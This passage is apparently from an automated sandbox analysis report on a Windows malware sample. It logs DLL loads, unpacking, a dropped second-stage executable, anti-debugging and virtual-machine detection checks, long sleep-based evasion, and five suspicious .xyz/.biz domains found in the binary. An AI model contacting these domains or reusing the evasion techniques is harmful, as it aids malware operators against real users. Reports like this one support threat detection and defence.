                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeUnpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeUnpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeUnpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeUnpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00410766 push ecx; ret 0_2_00410779
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0040FD8C push ecx; ret 0_2_0040FD9F
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B339D push 00000003h; ret 0_2_004B33A1
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B15F2 push es; iretd 0_2_004B1603
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B59AA pushad ; ret 0_2_004B59C6
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B5B28 push ecx; ret 0_2_004B5B45
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B2EFC pushad ; ret 0_2_004B2F24
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0215799F push esp; retf 0_2_021579A7
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021309CD push ecx; ret 0_2_021309E0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0213CE18 push ss; retf 0_2_0213CE1D
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02157F9D push esp; retf 0_2_02157F9E
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0212FFF3 push ecx; ret 0_2_02130006
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02159DE8 pushad ; retf 0_2_02159DEF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0041ACF6 push esp; iretd 2_2_0041ACFF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043F6EE push esp; iretd 2_2_0043F6EF
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043BF00 push eax; mov dword ptr [esp], 49484716h2_2_0043BF01
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_008DBCE5 pushad ; ret 2_2_008DBCEA
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_008DBF6B push ebp; ret 2_2_008DBF70
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024EC167 push eax; mov dword ptr [esp], 49484716h2_2_024EC168
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024EF555 push esp; iretd 2_2_024EF556
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024CAF5D push esp; iretd 2_2_024CAF66
                Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.371051868429859
                Source: 8BB0.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.371051868429859
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJump to dropped file
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeFile created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeJump to dropped file
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E974
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeWindow / User API: threadDelayed 457Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeWindow / User API: threadDelayed 9528Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-65409
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeAPI coverage: 5.1 %
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612Thread sleep count: 457 > 30Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612Thread sleep time: -329954s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612Thread sleep count: 9528 > 30Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612Thread sleep time: -6879216s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe TID: 2680Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004389F2 FindFirstFileExW,0_2_004389F2
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02158C59 FindFirstFileExW,0_2_02158C59
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.000000000054E000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_0043A9B0 LdrInitializeThunk,2_2_0043A9B0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC5E
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]0_2_0042FE5F
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004B0083 push dword ptr fs:[00000030h]0_2_004B0083
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021500C6 mov eax, dword ptr fs:[00000030h]0_2_021500C6
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0212092B mov eax, dword ptr fs:[00000030h]0_2_0212092B
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_02120D90 mov eax, dword ptr fs:[00000030h]0_2_02120D90
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_008D8B73 push dword ptr fs:[00000030h]2_2_008D8B73
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B092B mov eax, dword ptr fs:[00000030h]2_2_024B092B
                Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exeCode function: 2_2_024B0D90 mov eax, dword ptr fs:[00000030h]2_2_024B0D90
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0043BBC1 GetProcessHeap,0_2_0043BBC1
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3D3
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104D3
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_00410666 SetUnhandledExceptionFilter,0_2_00410666
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F911
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0214A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0214A63A
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0213073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0213073A
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0212FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0212FB78
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_021308CD SetUnhandledExceptionFilter,0_2_021308CD

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 8BB0.tmp.exeString found in binary or memory: debonairnukk.xyz
                Source: 8BB0.tmp.exeString found in binary or memory: diffuculttan.xyz
                Source: 8BB0.tmp.exeString found in binary or memory: effecterectz.xyz
                Source: 8BB0.tmp.exeString found in binary or memory: deafeninggeh.biz
                Source: 8BB0.tmp.exeString found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeProcess created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe" Jump to behavior
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: 0_2_0041077B cpuid 0_2_0041077B
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: GetLocaleInfoW,0_2_004351C0
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                Source: C:\Users\user\Desktop\DG55Gu1yGM.exeCode function: EnumSystemLocalesW,0_2_0043B282
